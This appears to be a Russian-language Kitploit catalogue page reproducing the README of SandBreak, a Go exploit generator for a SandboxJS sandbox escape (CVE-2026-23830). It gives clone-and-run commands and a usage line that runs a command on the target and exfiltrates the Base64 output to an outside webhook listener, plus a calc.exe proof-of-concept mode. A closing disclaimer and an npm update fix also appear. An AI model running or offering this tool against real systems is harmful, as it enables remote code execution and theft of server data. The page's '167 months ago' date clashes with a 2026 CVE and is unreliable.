Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23830-SandBreak — Генерирует и доставляет эксплойт-пейлоады для CVE-2026-23830, обхода песочницы SandboxJS, с режимами для слепой внеполосной (OOB) эксфильтрации и локального PoC с calc. Поддерживает HTTP/HTTPS-прослушиватели и создаёт минифицированные JavaScript-пейлоады. | Kitploit
Инструменты/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Генерирует и доставляет эксплойт-пейлоады для CVE-2026-23830, обхода песочницы SandboxJS, с режимами для слепой внеполосной (OOB) эксфильтрации и локального PoC с calc. Поддерживает HTTP/HTTPS-прослушиватели и создаёт минифицированные JavaScript-пейлоады.

Репозиторий
167 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SandBreak

CVE-2026-23830 Генератор эксплойтов и инструмент Auto-Pwn

Go Version License Type

SandBreak — это надёжный генератор эксплойтов на Go, предназначенный для использования уязвимости SandboxJS Escape (CVE-2026-23830).

Этот инструмент эксплуатирует незащищённый конструктор AsyncFunction в старых версиях sandboxjs, позволяя злоумышленникам выйти за пределы песочницы V8 и выполнить произвольный код на хост-системе. Он поддерживает несколько режимов полезной нагрузки, включая Blind OOB Exfiltration, Defacement и Error-Based RCE.


Возможности

  • 2 режима атаки:
    • oob: Внеполосная эксфильтрация данных (HTTP/HTTPS) для слепых сценариев.
  • calc: Запускает calc.exe (классический PoC).
  • Умный OOB: Автоматически определяет HTTP и HTTPS, чтобы предотвратить сбои сервера.
  • На основе Go: Один бинарный файл, никаких зависимостей на машине атакующего.
  • Лёгкий: Генерирует чистые, минифицированные JavaScript-полезные нагрузки.

  • Установка

    Клонируйте репозиторий и запустите:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Использование

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. Режим OOB (Blind RCE — профессиональный)

    Используйте его, когда у вас нет обратной связи по выводу. Он выполняет команду и отправляет результат в кодировке Base64 на ваш слушатель (например, webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Успешно обходит базовые сбои фильтрации исходящего трафика, обрабатывая сетевые ошибки.

    2. Режим Calc (локальный тест)

    Запускает калькулятор на сервере Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Доказательство концепции (PoC)

    Сценарий: OOB-эксфильтрация

    Атакующий получает данные пользователя сервера через Webhook, несмотря на отсутствие визуального вывода на сайте.


    Отказ от ответственности

    Этот инструмент создан только для образовательных целей и авторизованного тестирования на проникновение.

    • Не используйте этот инструмент на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
    • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

    Меры по устранению

    Обновите sandboxjs до последней версии, в которой конструктор AsyncFunction должным образом изолирован в песочнице.

    root@kitploit:~
    npm update sandboxjs
    

    Автор: Meysam Bal-afkan

    Лицензия: MIT

    Скачать инструмент